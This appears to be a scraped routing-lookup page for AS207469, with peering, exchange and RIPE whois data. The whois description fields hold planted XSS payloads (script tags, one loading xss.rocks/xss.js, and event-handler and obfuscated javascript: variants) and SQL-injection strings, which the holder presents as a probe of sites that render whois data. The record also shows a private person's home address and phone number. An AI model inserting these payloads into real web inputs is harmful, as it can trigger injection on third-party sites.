- AS Info
- Graph v6
- Prefixes v6
- Bogon
- Peers v6
- Whois
- IRR
- IX
- Traceroute
AS207469 has not been visible in the global routing table since September 29, 2023
Some of the information displayed is from that time.
Some of the information displayed is from that time.
Company Website:
Country of Origin:
Internet Exchanges: 2
Prefixes Originated (all): 1
Prefixes Originated (v4): 0
Prefixes Originated (v6): 1
Prefixes Announced (all): 0
Prefixes Announced (v4): 0
Prefixes Announced (v6): 0
RPKI Originated Valid (all): 0
RPKI Originated Valid (v4): 0
RPKI Originated Valid (v6): 0
BGP Peers Observed (all): 1
BGP Peers Observed (v4): 0
BGP Peers Observed (v6): 1
IPs Originated (v4): 0
AS Paths Observed (v4): 0
AS Paths Observed (v6): 0
Average AS Path Length (all): 0.000
Average AS Path Length (v4): 0.000
Average AS Path Length (v6): 0.000
Prefixes Originated (all): 1
Prefixes Originated (v4): 0
Prefixes Originated (v6): 1
Prefixes Announced (all): 0
Prefixes Announced (v4): 0
Prefixes Announced (v6): 0
RPKI Originated Valid (all): 0
RPKI Originated Valid (v4): 0
RPKI Originated Valid (v6): 0
BGP Peers Observed (all): 1
BGP Peers Observed (v4): 0
BGP Peers Observed (v6): 1
IPs Originated (v4): 0
AS Paths Observed (v4): 0
AS Paths Observed (v6): 0
Average AS Path Length (all): 0.000
Average AS Path Length (v4): 0.000
Average AS Path Length (v6): 0.000
Loading Website Preview...
AS207469 IPv6 Peers
ASN | Name |
---|---|
AS6939 | Hurricane Electric LLC |
AS207469 IPv6 Peer Count
AS207469 IPv6 Prefixes Announced
AS207469 IPv6 Prefixes Originated
AS207469 IPv6 Route Propagation
Prefix | Description | Visibility |
---|---|---|
Loading Prefixes... |
Prefix | Description |
---|---|
2a0f:5707:fff3::/48 |
Bogon Prefixes | ||
---|---|---|
Prefix | Type | Status |
Rank | Description | IPv4 | Peer |
---|---|---|---|
1 | Hurricane Electric LLC![]() |
AS6939 |
as-block: AS207421 - AS208187 descr: RIPE NCC ASN block remarks: These AS Numbers are assigned to network operators in the RIPE NCC service region. mnt-by: RIPE-NCC-HM-MNT created: 2023-07-26T16:18:11Z last-modified: 2023-07-26T16:18:11Z source: RIPE aut-num: AS207469 as-name: SUNGYULI descr: </textarea><script>alert(location.href,"XSS! FUX IT.")</script> descr: <script src=http://xss.rocks/xss.js></script> descr: <img src="javascript:alert('XSS! FUX IT.');"> descr: <img src="o" onerror="alert('XSS! FUX IT.')"></img> descr: ' -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: " -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: ` -- OR 1 = 1 AND 'SQLi' = 'SQLi' descr: <svg onload=alert%26%230000000040"XSS! FUX IT")> descr: <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'> descr: <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')> descr: <IMG SRC=`javascript:alert("XSS! FUX IT")`> descr: <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\> descr: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> descr: <IMG SRC= onmouseover="alert('xxs')"> descr: <img src=x onerror="& # 0000106avascript:alert('XSS')"> descr: <IMG SRC=& # 106;avascript:alert('XSS')> descr: <IMG SRC="jav ascript:alert('XSS! FUX IT');"> descr: .----------------. .----------------. .----------------. descr: | .--------------. | | .--------------. | | .--------------. | descr: | | ____ ____ | | | | _______ | | | | _______ | | descr: | | |_ _||_ _| | | | | / ___ | | | | | / ___ | | | descr: | | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | | descr: | | > `' < | | | | '.___`-. | | | | '.___`-. | | descr: | | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | | descr: | | |____||____| | | | | |_______.' | | | | |_______.' | | descr: | | | | | | | | | | | | descr: | '--------------' | | '--------------' | | '--------------' | descr: '----------------' '----------------' '----------------' descr: descr: |--------------------------------*---------------------------------| descr: | Hello there! | descr: | Maybe you saw these texts in descr. | descr: | These texts are used to test XSS vulnerability in website :) | descr: | If you see the alert which said 'XSS' or something, | descr: | then maybe the website you are looking at is vulnerable, | descr: | please contact the website owner to fix this :). | descr: | (By the way, there has a SQL injection test too.) | descr: | | descr: | Contact me : noc at sciuridae.network | descr: |------------------------------------------------------------------| org: ORG-SYL2-RIPE import: from AS206499 accept ANY export: to AS206499 announce AS207469 import: from AS31142 accept ANY export: to AS31142 announce AS207469 import: from AS6939 accept ANY export: to AS6939 announce AS207469 import: from AS205591 accept ANY export: to AS205591 announce AS207469 admin-c: SYL9-RIPE tech-c: SYL9-RIPE status: ASSIGNED mnt-by: RIPE-NCC-END-MNT mnt-by: SUNGYULI-MNT created: 2020-01-27T13:58:57Z last-modified: 2021-01-05T15:57:06Z source: RIPE sponsoring-org: ORG-HB116-RIPE organisation: ORG-SYL2-RIPE org-name: Sung Yu Li country: TW org-type: OTHER address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan phone: +886978079522 abuse-c: ACRO30109-RIPE admin-c: SYL9-RIPE tech-c: SYL9-RIPE mnt-ref: SUNGYULI-MNT mnt-by: SUNGYULI-MNT created: 2020-01-25T03:53:14Z last-modified: 2022-12-01T17:27:20Z source: RIPE # Filtered person: Sung Yu Li address: No.560 Yongan Road Luye Township, Taitung County 95541, Taiwan phone: +886978079522 nic-hdl: SYL9-RIPE mnt-by: SUNGYULI-MNT created: 2020-01-25T03:25:53Z last-modified: 2020-11-16T17:09:52Z source: RIPE
RIPE
aut-num: AS207469
as-name: SUNGYULI
descr: </textarea><script>alert(location.href,"XSS! FUX IT.")</script>
descr: <script src=http://xss.rocks/xss.js></script>
descr: <img src="javascript:alert('XSS! FUX IT.');">
descr: <img src="o" onerror="alert('XSS! FUX IT.')"></img>
descr: ' -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: " -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: ` -- OR 1 = 1 AND 'SQLi' = 'SQLi'
descr: <svg onload=alert%26%230000000040"XSS! FUX IT")>
descr: <svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("XSS! FUX IT")//'>
descr: <IMG SRC=JaVaScRiPt:alert('XSS! FUX IT')>
descr: <IMG SRC=`javascript:alert("XSS! FUX IT")`>
descr: <IMG """><SCRIPT>alert("XSS! FUX IT")</SCRIPT>"\>
descr: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
descr: <IMG SRC= onmouseover="alert('xxs')">
descr: <img src=x onerror="& # 0000106avascript:alert('XSS')">
descr: <IMG SRC=& # 106;avascript:alert('XSS')>
descr: <IMG SRC="jav ascript:alert('XSS! FUX IT');">
descr: .----------------. .----------------. .----------------.
descr: | .--------------. | | .--------------. | | .--------------. |
descr: | | ____ ____ | | | | _______ | | | | _______ | |
descr: | | |_ _||_ _| | | | | / ___ | | | | | / ___ | | |
descr: | | \ \ / / | | | | | (__ \_| | | | | | (__ \_| | |
descr: | | > `' < | | | | '.___`-. | | | | '.___`-. | |
descr: | | _/ /'`\ \_ | | | | |`\____) | | | | | |`\____) | | |
descr: | | |____||____| | | | | |_______.' | | | | |_______.' | |
descr: | | | | | | | | | | | |
descr: | '--------------' | | '--------------' | | '--------------' |
descr: '----------------' '----------------' '----------------'
descr:
descr: |--------------------------------*---------------------------------|
descr: | Hello there! |
descr: | Maybe you saw these texts in descr. |
descr: | These texts are used to test XSS vulnerability in website :) |
descr: | If you see the alert which said 'XSS' or something, |
descr: | then maybe the website you are looking at is vulnerable, |
descr: | please contact the website owner to fix this :). |
descr: | (By the way, there has a SQL injection test too.) |
descr: | |
descr: | Contact me : noc at sciuridae.network |
descr: |------------------------------------------------------------------|
org: ORG-SYL2-RIPE
import: from AS206499 accept ANY
export: to AS206499 announce AS207469
import: from AS31142 accept ANY
export: to AS31142 announce AS207469
import: from AS6939 accept ANY
export: to AS6939 announce AS207469
import: from AS205591 accept ANY
export: to AS205591 announce AS207469
admin-c: DUMY-RIPE
tech-c: DUMY-RIPE
status: ASSIGNED
mnt-by: RIPE-NCC-END-MNT
mnt-by: SUNGYULI-MNT
created: 2020-01-27T13:58:57Z
last-modified: 2021-01-05T15:57:06Z
source: RIPE
sponsoring-org: ORG-HB116-RIPE
remarks: ****************************
remarks: * THIS OBJECT IS MODIFIED
remarks: * Please note that all data that is generally regarded as personal
remarks: * data has been removed from this object.
remarks: * To view the original object, please query the RIPE Database at:
remarks: * http://www.ripe.net/whois
remarks: ****************************
Exchange | CC | City | IPv4 | IPv6 |
---|---|---|---|---|
KleyReX
![]() |
DE | Frankfurt | 193.189.82.202 | 2001:7f8:33::a120:7469:1 |
STUIX
![]() |
TW | Taipei City | 103.158.187.20 | 2a0f:5707:ffe3::20 |
Loading probes...
Select Probe | ||||
---|---|---|---|---|
Type | Name | ASN | IP | City |
⏳
Results will appear here.